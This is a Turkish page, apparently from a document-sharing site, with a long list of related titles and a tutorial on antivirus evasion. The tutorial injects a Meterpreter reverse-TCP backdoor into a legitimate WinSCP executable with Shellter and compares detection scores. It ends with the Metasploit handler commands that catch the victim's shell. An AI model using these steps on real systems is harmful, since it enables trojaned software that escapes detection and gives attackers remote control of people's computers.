Anti-Virüs Atlatma 3. Kurulum

Benzer belgeler
Anti-Virüs Atlatma 2. Kurulum

Anti-Virus Atlatma - Maligno Kullanımı

Anti-Virus Atlatma Maligno Kullanımı

Anti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

ADIM ADIM METASPLOIT METERPRETER SHELL DAVRANIŞ ANALİZİ

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

Düşünüyorum! Biraz tarihçe.. Maalesef yanılıyorsunuz.

Armitage Nedir? Kullanım Öncesi

06 - Bilgi Toplama ve Sosyal Mühendislik

Anti-Virus Atlatma - Maligno Kullanımı

Sonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.

Kaynak Kodlardan Derleme. Turquaz Muhasebe. Versiyon 0.2. Hüseyin Ergün. 26 Mart 2005

Windows Hacking - II

06 - Bilgi Toplama ve Sosyal Mühendislik

Turquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI

Smoothwall URL Filter Kurulumu

LOGO SMART NAVIGATOR

Bilgisayar Yazılımları

VMware Üzerine BackTrack 5 Kurulumu

Yerel Ağlarda Port 139 ve Saldırı Yöntemi

HACETTEPE ÜNİVERSİTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ BİLGİSAYAR AĞLARI LABORATUVARI DENEY 5. Yönlendiricilerde İşlem İzleme ve Hata Ayıklama

Saldırı Tespit ve Engelleme Sistemleri Eğitimi Ön Hazırlık Soruları

MODBUS GATEWAY KONFİGÜRASYON YAZILIMI

Wolvox Kapı Ekranı. AKINSOFT Wolvox Kapı Ekranı Yardım Dosyası. Doküman Versiyon :

MaestroPanel Kurulum

CYGWIN KURULUMU ve KULLANIMI

Bilgisayar Yazılımları

AKINSOFT. Eofis NetworkAdmin. AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu. Doküman Versiyon : Tarih : Copyright 2008 AKINSOFT

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net

Perga Sipariş Yönetim Uygulaması

Java ile OpenGL e Giriş. NetBeans IDE si üzerinden kurulum

NACA PROFİL AİLE GEOMETRİSİ HESAP PROGRAMI KULLANMA KILAVUZU

Java JDK (Java Development Kit) Kurulumu:

Linux Ubuntu Kurulumu

NPratik Yazılım Kurulum Kılavuzu. Yedekleme İşlemi

Güvenlik Araçları. Savunmadan çok saldırı ya yönelik araçlar. Amaç, saldırganlardan önce sistemdeki açıkları ortaya çıkarıp gereken önlemleri almak.

RPMNET WOLVOX REPORTER

Ulukom Devir İşlemleri

Trend Micro Worry-Free Business Security 8.0 İlk Kez Kurulumla İlgili İpuçları ve Püf Noktaları

WAMP SERVER KURULUMU

Kullanıcı Kitabı (2011)

ETA:MOBİL KURULUM TALİMATI

3CX Phonesystem Türkçe Anonsları Windows ve Linux İşletim Sistemlerinde Aktif Etme

Trickbot Zararlı Yazılımı İnceleme Raporu

ETA:SQL VE ETA:V.8-SQL PROGRAMLARINDA INSTALL ĐŞLEMĐNDE ANA BĐLGĐSAYAR KAVRAMI

Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.0'dan v3.1.0'a)

BY TEAM XECUTER. Versiyon 1.2

Bilgi Güvenliği Semineri

C için tümleşik geliştirme ortamı (IDE) kurulumları

HAZIRLAYAN BEDRİ SERTKAYA Sistem Uzmanı CEH EĞİTMENİ

REMOTE IO KONFİGÜRASYON YAZILIMI

Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır.

TL-WPS510U PRINT SERVER KURULUM DÖKÜMANI

04 - Veritabanı Sızma Testleri - 1

SHOP INGENICO DOKUMANI

DLMS MODBUS GATEWAY KONFİGÜRASYON YAZILIMI

JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?

OKUL HABER EKLEME MODÜLÜ TANITIM DOSYASI. Okul haberlerinizi ilçemiz web sitesinde yayınlayabilmek için aşağıdaki adımları uygulamanız gerekmektedir.

Murat ÖZBEK

İşletme ve Devreye Alma Planı Yerel Okul Sunucusu Uygulama Yazılımları Prototipi TRscaler Technology Solutions

Program Kurulum. Turquaz Muhasebe. İçindekiler

ANTİVİRÜS KURULUM ADIMLARI

e-imzatr Kurulum Klavuzu

Checkpoint SmartCenter da hızlı obje yaratmak

Windows 7 - IIS 7.5 üzerine PHP ve MySQL kurulumu

Teknoloji Özeti vspace Kurulum Değişiklikleri Windows Yükleyicisi.MSI

Ağ Üzerinde MATLAB kurulum rehberi (Sunucu makine)

DESTEK DOKÜMANI. Ürün : Tiger Enterprise/ Tiger Plus/ Go Plus/Go Bölüm : Kurulum İşlemleri

İstemci Tabanlı Saldırı Türleri. Ozan UÇAR

NA VNC SERVER KULLANIMI. Genel Bilgi NA VNC Server Ayarları

OBEE (Call Statistic Reporter)

Bu bölüm V- Ray License Server lisans sunucusu uygulamasının kurulumundan

Örnek bir kullanım ve bilgisayar ağlarını oluşturan bileşenlerin özeti

2- Kontrol Sil En Öne Getir En Arkaya Gönder Resim Özellikler: Genel Özellikler...

Yaptığımız web sitelerinin daha kullanışlı olması için veritabanı sistemleri ile bağlantı kurup ihtiyaca göre verileri okuyup yazmasını isteriz.

Nagios Network Monitör Uygulaması -2

Kullanım Kılavuzu. G-Sec'e Genel Bakış

SX İŞLETİM SİSTEMİ ÖZELLİKLERİ

Yandex mail ve disk kullanım rehberi

GOSS SORU BANKASI ÖNERİ HAVUZU OLUŞTURMA KILAVUZU

Lisanslama Sistemi ve Set Yükleme İşlemleri

En bilindik truva atları Xtreme Rat ve Darkcomet Rattır.

Personel Programında Bordro Zarfı İçin Dizayn Desteği

Tarih: 2 Ağustos 2018 Son versiyon: 1.8. EndNote X9 Windows Multi/Site kurulum talimatları

Linux Kurulumu (Sürüm 1.52) İçindekiler

Nessus ile şirket içi pentest (Sızma)

WebSiteDefender ile Web Uygulama Güvenliği

Apache üzerinden Red Hat 5 yüklenmesi

e-imzatr Kurulum Klavuzu

Proticaret Exclusive Versiyon Yükseltme Dokümanı(v.3.2.0'dan v3.2.1'e)

1 Temmuz 2014 Netsis Standard 2 1 Temmuz 2014

EPC-N KÜMES OTOMASYONU. Cloud. EPC-N Uygulama Notu 03 - Cloud

10.2 VERİYONUNUN KURULABİLMESİ İÇİN EĞER VARSA ÖNCEKİ. ArcGIS SÜRÜMLERİNİN PROGRAM EKLE-KALDIR SEÇENEĞİYLE

10 ADIMDA KR AKADEMİ DVD İZLEME PROGRAMI KULLANIM KLAVUZU

Mobil Uygulama Kullanma Kılavuzu

YENİ NESİL ÖKC İLE ON-LİNE İŞLEMLER (Hugin / Profilo)

Metasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı

V Daq Kurulum adımları

Transkript:

Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass aracıdır. Genel olarak var olan bir çalıştırılabilir dosyaya zararlı yazılımımızı entegre etmeye yarar. Bu şekilde ürettiğimiz (Metasploit in msfvenom aracını kullanarak) arka kapıyı, çalıştırılabilir dosya formatı olan exe formatındaki dosyalara Shellter ile enjekte edip kurban makinesinde çalıştırabiliriz. Kurulum Anlatılacak olan işlemlerde Kali linux işletim sistemi kullanıldığı için, işlemler linux sistemlere göre anlatılacaktır. Shellter in download sayfasını incelediğimiz vakit bir kaç alternatif olduğunu görüyoruz. Zip dosyasını indirmek (Yazım sırasındaki son versiyon v5.1) Linux dağıtımlarının depolarından kurmak (Kali için v3.1) Debian/Arch dağıtımları için hazır paket ile kurmak (Debian için v2.0) Alternatifler böyle iken zip dosyasını indirip, son versiyon ile çalışmak daha mantıklı olacaktır. Bu arada v4.0 dan sonra Shellter içerisinde bulunan hazır payloadları enjekte etme seçeneği eklenmiştir. Versiyon 4 ten önce, kendi hazırladığımız payload ile çalıştırılabilir dosyayı birleştirip anti-virüs bypass işlemini gerçekleştiriyorduk. Uygulama linux ortamlarda Wine ile çalışmaktadır. Download sayfasından indirdiğimiz zip dosyasını, açtıktan sonra klasör içerisinde yer alan shellter.exe yi wine ile çalıştırmak

yeterlidir. Kısa bir süre gerekli konfigürasyonlar yapılacak ve Shellter başlayacaktır. Kurban bilgisayar Windows 7, saldırgan ise Kali Linux kullanmaktadır. Auto-Manual Mod Shellter içinde iki mod vardır. Bunlardan biri Manual, daha esnek bir şekilde işlemler gerçekleştirilir, kullanıcıyla fazla iletişim kurarak zararlıyı çalıştırılabilir dosyaya enjekte eder. Diğeri Auto, bu modda iken daha seri bir şekilde, çok fazla uygulamaya müdahale etmeden, kısa bir kaç işlem sonunda zararlıyı çalıştırılabilir dosyaya enjekte edebilirsiniz. Shellter in giriş ekranından bir kare;

Auto Mode İlk olarak auto mod ile bir zararlı yazılım oluşturalım ve bunun online tarama sayfalarındaki sonuçlarını görelim. Seçilecek olan mod Auto, uygulamaya girilecek opsiyon ise A dır. Yapılacak işlemin modunu seçtikten sonra arka kapıyı enjekte edeceğimiz çalıştırılabilir dosya formatındaki dosyanın yolunu vermemiz gerekmektedir. Örnek olarak SFTP yazılımı olan WinSCP yi kullanıyoruz.

Stealth Mode Bahsi geçen Stealth modu, Shellter in 5.0 versiyonuyla beraber gelmiştir. Bu modun aktif edilmesi ile bir dosyaya birden çok sayıda payload enjekte edilebilmektedir. Enjekte edilen payloadlar birbirinden bağımsız şekilde çalışabilirler. Payloads Versiyon 4 ile birlikte Shellter kendi içerisinde gömülü olarak payload seçme seçenekleri sunuyor demiştik. Sunulan seçenekler arasında meterpreter için bind ve reverse TCP, reverse HTTP ve HTTPS gibi Metasploit payloadları mevcuttur. Bu yazıda Shellter içerisinde gömülü olarak gelen payloadlardan olan Meterpreter_Reverse_TCP kullanılacaktır. Bir sonraki yazıda ise özel olarak kendi ürettiğimiz payload ı Shellter aracılığıyla çalıştırılabilir dosyaya enjekte edip sonuçları göreceğiz. Listelenmiş payloadlardan birini kullanmak için interaktif ekrana L girmemiz gerekiyor. Daha sonra kullanacağımız payloadın, verilenler arasından, index numarasının girilmesi gerekmektedir.

Payloadın index numarasını girdikten sonra, payloadın tipine bağlı olarak girilmesi gereken parametrelerin değerleri olacaktır. Bizim seçtiğimiz payload için girilmesi gerken iki parametre vardır. LHOST ve LPORT değerleri. Bunlar Metasploit tarafında başlatacağımız handler için dinlemede bulunacak IP ve port değerleridir. Gerekli değerler girildikten sonra Shellter, payload ile ilgili kısa bir özet geçerek zararlı enjekte işlemine başlayacaktır.

Kısa bir sürenin ardından, çalıştırılabilir dosyanın boyutuna bağlı olarak, seçtiğimiz payload çalıştırılabilir dosyaya enjekte edilecektir. Tarama Sonucu Oluşturduğumuz zararlı yazılımın, online tarama sonucu aşağıda ki resimlerde verilmiştir. İlk olarak VirusTotal sayfasında yaptığımız taramanın sonucunu görelim.

Bir diğer online malware tarama sayfası olan Jotti den gelen sonucunu görelim. Resimlerden anlaşılacağı üzere Shellter anti-virus bypass yazılımı, bir önceki yazıda anlattığımız Veil-evasion dan daha iyi sonuçlar vermektedir. Reverse Bağlantı Oluşturduğumuz zararlı yazılım öncelikle Metasploit tarafında dinlemeye almamız gerekiyor, gelen bağlantıları yakalamak için. Bunu yapmak için multi/handler modülünü kullanarak gerekli opsiyonları düzenleyip dinlemeyi başlatmamız gerek. Bunun için oluşturduğumuz payloada göre girilecek komutlar aşağıdaki gibidir. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 172.17.7.134 set lport 5656 set exitonsession false exploit -j -z

Oluşturulan zararlı yazılımın kurban bilgisayarında çalıştırılması sonucunda, dinlemeye aldığımız handler a session düşecektir. Bir sonraki yazıda Shellter ı kullanarak, kendi oluşturduğumuz payloadı çalıştırılabilir bir dosyaya enjekte edeceğiz ve tarama sonuçlarını karşılaştıracağız.